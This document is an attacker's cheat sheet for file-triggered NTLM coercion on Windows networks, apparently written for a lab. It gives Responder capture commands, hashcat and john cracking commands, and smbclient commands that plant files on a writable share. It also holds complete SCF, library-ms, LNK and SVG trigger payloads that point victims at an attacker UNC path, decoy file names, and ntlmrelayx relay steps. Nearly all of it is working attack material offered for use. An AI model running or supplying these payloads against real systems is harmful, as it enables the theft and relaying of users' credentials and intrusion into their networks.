File-triggered NTLM coercion abuses files that cause Windows Explorer or another client application to resolve a remote path. If we can place one of these files in a share or delivery location that a user browses or extracts, the client may authenticate to an attacker-controlled UNC path and expose NetNTLMv2 material.
The primitive is simple. We control a file. The file references \\attacker\share\resource. The victim browses, previews, extracts, or opens the file. Windows tries to retrieve the remote resource. The client authenticates to the attacker listener.
Listener
sudo responder -I eth0
sudo responder -I tun0
Responder loot
ls -la /usr/share/responder/logs/
cat /usr/share/responder/logs/*NTLMv2*.txt
Crack NetNTLMv2
hashcat -m 5600 /usr/share/responder/logs/*NTLMv2*.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt /usr/share/responder/logs/*NTLMv2*.txt
Place payload on writable SMB share
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "put @Inventory.scf"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "put payload.library-ms"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "put report.pdf.lnk"
SCF trigger
[Shell]
Command=2
IconFile=\\10.10.10.100\share\legit.ico
[Taskbar]
Command=ToggleDesktop
Use a name that sorts early when testing share browsing behavior.
@Inventory.scf
@Quarterly.scf
@Readme.scf
Library-ms trigger
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>Documents</name>
<version>1</version>
<isLibraryPinned>true</isLibraryPinned>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<simpleLocation>
<url>\\10.10.10.100\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Package library-ms in a zip
zip upload.zip payload.library-ms
LNK trigger from Windows
$w = New-Object -ComObject WScript.Shell
$lnk = $w.CreateShortcut("C:\Users\Public\report.pdf.lnk")
$lnk.TargetPath = "\\10.10.10.100\share\document.pdf"
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Quarterly report"
$lnk.Save()
LNK trigger into a share
$w = New-Object -ComObject WScript.Shell
$lnk = $w.CreateShortcut("\\dc01.ootw.local\IT\report.pdf.lnk")
$lnk.TargetPath = "\\10.10.10.100\share\document.pdf"
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Save()
SVG remote reference
<svg xmlns="http://www.w3.org/2000/svg">
<image href="\\10.10.10.100\share\icon.ico"/>
</svg>
Common trigger families
.library-ms
.searchConnector-ms
.lnk
.scf
.url
.svg
.html
Office documents with remote template or external resource references
Archive files containing one of the above
Use capture for cracking
sudo responder -I eth0
hashcat -m 5600 /usr/share/responder/logs/*NTLMv2*.txt /usr/share/wordlists/rockyou.txt
Use capture for relay
ntlmrelayx.py -tf smb-relay-targets.txt -smb2support
Then use a file trigger that makes the victim authenticate to the relay listener instead of only to Responder.
Cleanup
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "del @Inventory.scf"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "del payload.library-ms"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "del report.pdf.lnk"
Notes
This is user-interaction coercion. The file has to be browsed, previewed, extracted, indexed, or opened by something that follows the remote reference.
SCF behavior is version-dependent and does not work reliably on newer Windows Server builds. Treat it as one payload in the family, not the whole technique.
Do not run Responder and ntlmrelayx.py with competing SMB listeners on the same interface. Use one capture or relay plan at a time.